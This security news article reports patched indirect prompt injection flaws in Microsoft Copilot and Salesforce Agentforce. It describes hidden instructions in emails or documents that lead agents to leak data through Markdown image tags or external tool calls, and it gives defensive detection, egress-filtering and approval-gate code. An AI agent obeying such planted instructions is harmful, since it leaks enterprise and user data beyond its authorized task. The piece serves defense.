Microsoft and Salesforce Patch Prompt Injection Flaws in AI Agents
- [01] Attackers can use indirect prompt injection to exfiltrate sensitive enterprise data from AI agents to external malicious servers.
- [02] Microsoft Copilot and Salesforce Agentforce platforms are primary targets for these logic-based data leak vulnerabilities.
- [03] Organizations must apply platform updates and enforce the principle of least privilege for all autonomous AI agents.
Recent research has highlighted significant security gaps in the rapidly expanding ecosystem of autonomous AI agents. According to Dark Reading, both Microsoft and Salesforce have addressed vulnerabilities that allowed phishing-style prompt injection to trigger unauthorized data exfiltration. The flaws affected Microsoft Copilot and Salesforce Agentforce, two major platforms designed to automate business workflows by interacting with internal company data. They underscore the risks of granting AI tools broad access to sensitive corporate environments without adequate input sanitization.
The vulnerabilities are classified as indirect prompt injection. In this technique, an attacker places malicious instructions within a document or data source that the AI agent is likely to process. Unlike direct prompt injection, where the malicious instructions are typed into the chatbot itself, indirect injection exploits the agent’s ability to ingest third-party data. For instance, an attacker could send an email or share a document containing hidden text that instructs the AI to summarize the contents and send that summary to a remote C2 server. This type of attack is particularly insidious because it requires no direct interaction between the victim and the malicious actor.
How to detect indirect prompt injection attacks
Detecting these attacks requires a shift in traditional monitoring. Security teams must look for anomalies in how AI agents interact with external APIs or URLs. If a SOC analyst observes an AI agent attempting to render an image from an unknown external domain or append sensitive user data to a URL query parameter, it may indicate a successful injection. Since many of these agents operate within the context of a user’s session, the attack can bypass Zero Trust boundaries if the agent is over-privileged.
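The two indicators described above (an image rendered from an unknown external domain, and sensitive data appended to a URL query parameter) can be sketched as a simple scan over agent output. This is a minimal illustration, not a vendor detection rule: the `KNOWN_HOSTS` set, the `SENSITIVE` patterns, and the `flag_agent_output` function are all hypothetical names chosen for this example, and a real deployment would tune them to its own environment.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Hypothetical set of hosts the agent is expected to reference.
KNOWN_HOSTS = {"intranet.example.com", "files.example.com"}

# Markdown image syntax: ![alt](url)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^\s)]+)")
# Any http(s) URL appearing in the text.
ANY_URL = re.compile(r"https?://[^\s)\"'<>]+")
# Illustrative patterns for values that should not appear in a query string.
SENSITIVE = [
    re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),  # email address
    re.compile(r"[A-Za-z0-9_\-]{32,}"),       # long token-like string
]

def flag_agent_output(text):
    """Return (finding_type, url) pairs for suspicious URLs in agent output."""
    findings = []
    image_urls = set(MD_IMAGE.findall(text))
    for url in sorted(set(ANY_URL.findall(text))):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        # Indicator 1: a link or image pointing at a host we do not recognize.
        if host not in KNOWN_HOSTS:
            kind = "external_image" if url in image_urls else "external_url"
            findings.append((kind, url))
        # Indicator 2: sensitive-looking data carried in a query parameter.
        for _, value in parse_qsl(parsed.query):
            if any(p.search(value) for p in SENSITIVE):
                findings.append(("sensitive_query_param", url))
                break
    return findings

if __name__ == "__main__":
    sample = "Done. ![s](https://evil.example/p.png?d=alice@corp.example)"
    for finding in flag_agent_output(sample):
        print(finding)
```

A scan like this only catches exfiltration attempts that surface as URLs in the agent's output; it would need to be paired with network-level logging to cover tool calls made outside the rendered response.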
In the Salesforce Agentforce case, researchers found that the agent could be manipulated into using a “tool” to call an external endpoint. This could result in the leakage of session tokens or proprietary data. Similarly, Microsoft Copilot vulnerabilities involved manipulating the agent’s rendering capabilities to leak data via Markdown-based image tags. While no specific CVE has been assigned to these logic-based flaws in the cloud platform layer, the impact is comparable to high-severity vulnerabilities that lead to data loss.
Microsoft Copilot prompt injection mitigation
To protect against these threats, defenders should focus on the principle of least privilege for AI identities. Just as a human user should only have access to the data necessary for their role, an AI agent should be restricted to specific data silos. Implementing strict egress filtering is also essential. By restricting the domains that an AI agent can communicate with, organizations can prevent data from being transmitted to attacker-controlled infrastructure. This reduces the likelihood of a successful supply chain attack in which compromised external data sources affect internal AI logic.
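Egress filtering for an agent can be sketched as a domain allowlist check applied before any outbound request. The example below is an assumption-laden illustration rather than a feature of either platform: `ALLOWED_SUFFIXES` and `egress_allowed` are hypothetical names, and the listed domains are placeholders.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; real values depend on the organization's integrations.
ALLOWED_SUFFIXES = ("api.internal.example", "crm.example.com")

def egress_allowed(url, allowed=ALLOWED_SUFFIXES):
    """Return True only for HTTPS URLs whose host is an allowed domain or a subdomain of one."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False
    host = (parsed.hostname or "").lower().rstrip(".")
    # Match the exact domain or a true subdomain; a plain substring or
    # endswith check would also accept look-alikes such as "evilcrm.example.com".
    return any(host == s or host.endswith("." + s) for s in allowed)

if __name__ == "__main__":
    for candidate in (
        "https://eu.crm.example.com/records",
        "https://evilcrm.example.com/collect",
        "https://crm.example.com.attacker.example/collect",
    ):
        print(candidate, egress_allowed(candidate))
```

Matching on the dot-delimited suffix rather than a raw substring is the key design choice here, since attacker-registered look-alike domains are a common way around naive allowlists.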
Furthermore, Salesforce's data leak protection updates for Agentforce emphasize the importance of human-in-the-loop (HITL) requirements for high-risk actions. When an AI agent attempts to send data outside the corporate environment or take an action that would escalate privileges, the system should require manual approval. This serves as a critical circuit breaker against automated data exfiltration. As organizations continue to integrate AI into their core operations, the focus must remain on verifying the integrity of the data being consumed by these autonomous systems.
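The human-in-the-loop circuit breaker described above can be sketched as a gate that sits between the agent and its tools. This is a hypothetical illustration, not how Agentforce or Copilot implements approvals: `HIGH_RISK_ACTIONS`, `ApprovalGate`, and the `approver` callback are names invented for this example.

```python
from dataclasses import dataclass, field
from typing import Callable

# Hypothetical set of action names treated as high risk.
HIGH_RISK_ACTIONS = {"send_external_email", "http_post_external", "change_permissions"}

@dataclass
class ApprovalGate:
    # Callback that asks a human reviewer and returns True if they approve.
    approver: Callable[[str, dict], bool]
    audit_log: list = field(default_factory=list)

    def execute(self, action, params, handler):
        """Run handler(**params), requiring human approval first for high-risk actions."""
        if action in HIGH_RISK_ACTIONS:
            approved = self.approver(action, params)
            self.audit_log.append((action, approved))
            if not approved:
                raise PermissionError(f"{action} was not approved by a human reviewer")
        return handler(**params)

if __name__ == "__main__":
    gate = ApprovalGate(approver=lambda action, params: False)  # reviewer denies everything
    print(gate.execute("summarize", {"text": "quarterly report"}, lambda text: text.upper()))
    try:
        gate.execute("http_post_external", {"url": "https://unknown.example"}, lambda url: "sent")
    except PermissionError as err:
        print("blocked:", err)
```

Low-risk actions pass straight through, so the approval step adds friction only where data could leave the environment or permissions could change.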